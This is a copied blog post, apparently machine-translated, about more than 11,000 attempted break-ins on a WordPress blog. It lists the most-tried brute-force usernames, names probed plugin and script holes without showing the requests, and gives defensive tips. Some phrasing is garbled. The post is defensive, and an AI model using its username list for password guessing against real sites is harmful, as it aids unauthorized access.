Copy of article on WordPress security

11,000 attempted hacks in 4 months! How Safe Is Your WordPress?

Over the last 4 months, I noticed more than 11,000 (yes, eleven thousand) attempts to break into my blog.  I’ve compiled a list of the most  commonly used methods used by these hackers.  I’ve also listed some simple and effective tips on how to protect against them. If you want to avoid unpleasant surprises, such as. Cadres from the gay porn on the main, read on 🙂

Guessing the password

The most common method used by the burglars were unauthorized attempts to log into the admin panel. In total, there were more than 10 000.

Login form

Here are the top ten most popular logins used for this purpose:

1. admin 5158
2. Administrator 1232
3. wpsamurai 1175
4. adm 686
5. user 591
6. user2 524
7. Tester 429
8. test 379
9. support 350
10. админ 313

I hope that all those who have an account with the name admin skin crawl now 🙂 I think with a simple password, for 5000 samples chances of success are quite large.

My second favorite with regard to the theoretical efficiency, the account test . Who assuming the test account, it sets a secure password? Shoot that passwords are the most common style 123, or 111. Unfortunately, the test did not write passwords used by burglars, but I’m working on it 🙂

Burglary attempt to effect more than 2000 different IP addresses from all over the world. Most active attempt to address more than 900 times.

To guard against this type of incident, just do not use obvious account names and use strong passwords.Additionally, you can install one of the WordPress plugins to improve safety that blocks users from the machine after several failed attempts. Here is an example of settings for the plug Better WP Security .

Protection against brute force attacks

After 10 failed attempts to log on to a specific account, or after 5 unsuccessful attempts with a particular computer, the user is locked for 15 minutes. In addition, you can set the overall blocking the IP address, if these attempts will be repeated.

Use of holes

In addition to simple attempts to bypass a password, there have been more sophisticated methods involving the use of holes in a variety of templates and scripts.

Some tried by TinyMCE ( hole description ):

Some sought Akismet plugin ( application hacking ):

TimThumb script template ( hole description ):

By PhpThumb template ( hole description ):

Through a hole in Themify:

This trial was an interesting shot 🙂

It was a clever 🙂 Admit who has such or similar files in the root directory? 🙂

A few easy-to-use tips to increase your site’s security

In conclusion, 99% of the above mentioned attacks can be neutralized by holding a few simple rules:

  1. Always update your WordPress to the latest version (especially for security fixes). Trivial, so much is said about it, and still a lot of people do not.
  2. Update plugins and themes to the latest version.
  3. Use plugins and themes that are being actively developed. Think twice before installing anything from the WordPress repository, which has not been updated for 2 years. The older the plug, the greater the chance that there’s a hole that nobody patched.
  4. If you do not already use plugin or theme, even though it is turned off, there may still be dangerous.Did you use? Uninstall!
  5. Use strong passwords. Password admin123 not a strong password 🙂 PasswordG1Twvnx54FlkVXglRXJN will be better 🙂
  6. If you have an account named admin , whether you use it or not, change its name! This will help you in this instance. Plug Better WP Security . A simple change and half of the attacks there is no chance of success!
  7. Install Plugin improves security (eg. Better WP Security ), which will tell you how you can still secure.
  8. If you want to limit the number of attacks related to logging, add the authorization in the .htaccess file.Eliminates password guessing attempts in 99% of cases.

These are really simple advice to apply. There is nothing complicated here (well, maybe the last point requires a little more knowledge, but I will explain this in more detail soon 🙂


If someone believes that his blog, or website are little known, and no one will try to not break, it’s moving out of the error. Vending machines do not look if you are familiar or not, it’s important to gain access to another system and use it in one way or another.

Animated gif on the top of the page is an excerpt from the movie Bruce Almighty.

Leave a Reply

Your email address will not be published. Required fields are marked *